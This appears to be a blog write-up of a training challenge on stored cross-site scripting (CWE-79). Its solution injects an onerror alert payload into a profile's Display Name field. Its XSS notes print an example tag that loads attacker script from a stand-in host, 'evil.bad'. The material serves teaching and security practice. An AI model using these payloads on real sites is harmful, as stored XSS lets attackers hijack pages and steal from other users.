[Challenge]

The purpose of this challenge is to demonstrate the MITRE Top 25 programming flaw: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')".


The developers of the application implemented a social networking feature where users can see each other's profiles. This is a nice-looking rich UI widget based on Bootstrap and jQuery. Users have the ability to preview how their profile looks to others.

Obviously there's XSS in this newly introduced feature. You won't have to do anything nefarious, like stealing credentials, to pass the challenge.

Simply produce a JavaScript alert that says FIRE! (including the exclamation mark). Every time a user sees your profile they should see the FIRE! message. You can have fun with the page and pop up all kinds of messages if you'd like, but when you're ready, pop up FIRE! and you can get your code.

Note: Due to complexities associated with executing JavaScript on the server side, the validation for the challenge is a regular expression so if you encounter any false positives/negatives, please excuse the organizers.

Tips for completing the challenge

  • It is not enough to insert HTML markup in the page. You need to see the actual JavaScript pop-up.
  • Use view source to look at the JavaScript code in the page. See if you can spot an issue there.
  • Leverage the payloads on this page. See if any of them pops.


PS: The challenge is inspired by the real-life story of the Samy worm, the fastest-spreading virus of all time.


[Challenge description]

  This challenge asks us to use an XSS attack so that a pop-up reading FIRE! appears whenever a user views your profile.

[Weakness hint]

The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

From MITRE CWE-79

  An XSS attack supplies executable JavaScript code as an input value; once that code is submitted to the web page it is executed. There are several basic types of XSS attack; those interested can look them up for themselves, so they are not described in detail here. The challenge's supplementary notes on XSS are attached below:


A Bit About XSS

Web applications have become extremely widespread due to their portability and ease of use. At the same time Cross-Site Scripting (XSS) has become one of the most common security bugs found in software.

The main impact of XSS is that it allows attackers to alter the functionality of the web application. This is possible because attackers can inject JavaScript into the page. A common technique is to inject a JavaScript include pointing to a site the attacker controls. Then they can write large scripts; even JavaScript keyloggers have been written. Example malicious input: <script src="https://evil.bad/attack.js"></script> The same concept applies to "Inclusion of Functionality from Untrusted Control Sphere".

XSS is relatively easy to find by novice testers, while at the same time it can be very hard to prevent. There are many areas in a page that need to be protected, and many different types of payloads depending on each area.

For a list of many other XSS payloads visit: The OWASP XSS Filter Evasion Cheat Sheet

[Solution]

  1. Open the page: https://insecureinctm.us-east-1.elasticbeanstalk.com/cwe79.jsp
  2. Log in as demo with the password demo1234.
  3. Enter the following value in the Display Name field: <img src=bla onerror=alert('FIRE!')>
  4. Press Update; a pop-up reading FIRE! appears and the task is complete.

[Security principle]

  This XSS attack was guessed from the code shown in the challenge hint. To prevent XSS attacks, the input field values must be checked and the scripting characters in them neutralized before they are placed in the page.

Tuesday, February 26, 2019
